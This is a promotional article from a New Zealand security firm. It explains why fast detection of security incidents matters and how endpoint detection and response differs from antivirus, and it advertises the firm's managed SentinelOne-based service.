Time to detection is a critical metric when dealing with security incidents because the faster an incident is detected, the faster it can be contained, mitigated, and remediated. The longer it takes to detect, the more time the attacker has to move laterally within the network, steal sensitive data, or cause damage to the system.
As a result, CodeBlue’s security team strongly recommends all New Zealand SMBs to consider upgrading their endpoint protection to a EDR platform where feasible.
What is Endpoint Detection and Response (EDR)?
Endpoint Detection and Response (EDR) is a modern replacement for traditional antivirus solutions that primarily detect and protect endpoints from known signature-based viruses in their database. Unlike traditional antivirus solutions, EDR leverages artificial intelligence and behaviour analysis to protect endpoints. It collects data from endpoints and examines it for malicious or anomalous patterns in real-time.
An EDR system detects infection and initiates a response – providing security teams with an extra layer of security and visibility against unknown (zero-day) vulnerabilities.
CodeBlue’s Managed Endpoint Detection and Response (MDR)
CodeBlue’s Managed Endpoint Detection and Response (MDR) utilises a next-generation endpoint agent powered by SentinelOne. It incorporates Machine Learning (ML) and Artificial Intelligence (AI) to stream relevant data back to our Security Operations Centre (SOC). Our SOC enriches the data with threat intelligence, to correlate trends and pinpoint artifacts of interest. Our SOC analysts then investigate these artifacts. If an actionable alert is identified, it’s relayed to our client via an easy-to-understand response plan, along with supporting information.
Agents are deployed on client workstations and servers across traditional or cloud workloads. These agents record system activity and compare it against an internal knowledge base of rulesets and work patterns.
The results of this analysis, along with the necessary metadata, are sent to CodeBlue’s SOC for enrichment against our threat database and global AI analysis engine. Furthermore, since EDR agents ingest logs from the endpoints, our SOC can obtain and query valuable information which is not available in traditional antivirus products in scenarios such as supply chain attacks.
We hope this information explains the importance of upgrading your endpoint protection beyond traditional antivirus. CodeBlue recommends a Managed Endpoint Detection and Response platform.